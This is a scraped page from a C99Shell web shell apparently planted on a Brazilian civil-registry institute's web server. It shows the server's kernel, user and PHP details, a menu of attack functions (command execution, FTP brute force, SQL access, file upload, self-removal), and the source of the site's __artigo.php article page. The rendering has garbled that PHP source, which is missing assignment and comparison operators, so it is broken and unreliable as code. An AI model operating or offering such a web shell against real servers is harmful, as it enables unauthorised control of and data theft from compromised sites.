!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16. PHP/5.4.16 

uname -a: Linux roko-bkp 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64 

uid=48(apache) gid=48(apache) groups=48(apache),1003(webmaster) 

Safe-mode: OFF (not secure)

/var/www/html/   drwxr-xr-x
Free 9.44 GB of 93.48 GB (10.09%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     __artigo.php (3.99 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
//inclui o template de cabecalho

$title="IRPEN | Instituto de Registro Civil de Pessoas Naturais do Paraná - 2011";
include(
"cabecalho.php");
$art=$_GET['art'];

?>

            <div id="cont_geral">

                                  <div id="cont_esq">

                                      <h2 class="tit4">ARTIGOS</h2>

                                      <br />
                                      <?php
                                            
//Lista os artigos da página
                                            
$sql_artigo LISTA_ARTIGOS;

                                            
$sql_artigo ="select * from artigo where ART_AtivoSN='S'";
                                            
$rs_artigo  $conexao->query($sql_artigo);

                                            if(
$rs_artigo->num_rows 0)
                                            {
                                                while(
$artigo $rs_artigo->fetch_array())
                                                {

                                                    
$cod_artigo       $artigo["ART_RowID"];
                                                    
$titulo            $artigo["ART_Titulo"];
                                                    
$data_publicacao   explode(" ",$artigo["ART_DtInicioPublicacao"]);
                                                    
$data_publicacao   FormataData($data_publicacao[0],"SCREEN");
                                                    
$novidadeSN        $artigo["ART_NovidadeSN"];
                                                    
$importanteSN       $artigo["ART_ImportanteSN"];
                                                    
$tipo_fonte        $artigo["ART_TipoFonte"];
                                                    
$texto_resumido    stripslashes($artigo["ART_TextoResumido"]);
                                                    
$texto_completo    stripslashes($artigo["ART_TextoCompleto"]);

                                                    echo 
"<div class=\"box_principal\">";
                                                    echo 
"<div class=\"artigo\">";

                                                    echo 
"<p>";

                                                    
//Data de publicação
                                                    
echo "<span class=\"data_publicacao\">(".$data_publicacao.") - </span>";


                                                        
?>
                                                        <span class="titulo"><a href="artigos.php?art=<?=$cod_artigo?>" ><?=utf8_encode($titulo)?></a></span>
                                                        <?php

                                                    
echo "</p>";

                                                    echo 
"<a style=\"font-family: Verdana, Tahoma, arial, sans-serif; font-size: 10px; color: #fff; background: #BC9F65; display: block; padding: 1px; width: 70px; margin:5px 0 5px 5px; font-size: 9px; text-align: center\" href=\"artigos.php?art=$cod_artigo\">Saiba mais +</a>";

                                                    echo 
"</div>";
                                                    echo 
"</div>";
                                                    echo 
"<hr class=\"separador\">";
                                                }
                                            }
                                            else
                                            {
                                                echo 
"<p class=\"sem_resultado\">Não foram encontradas notícias.</p>";
                                            }

                                            
// ************************************** INICIO - Paginação (navegação) **************************************//
                                                
echo "<p id=\"paginacao\">";





                                        
?>


                                  </div> <!--fecha a div "cont_esq"-->




<?php
//inclui o template do menu da direita
include("menu_direita.php");

//inclui o template de rodapé
include("rodape.php");
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0044 ]--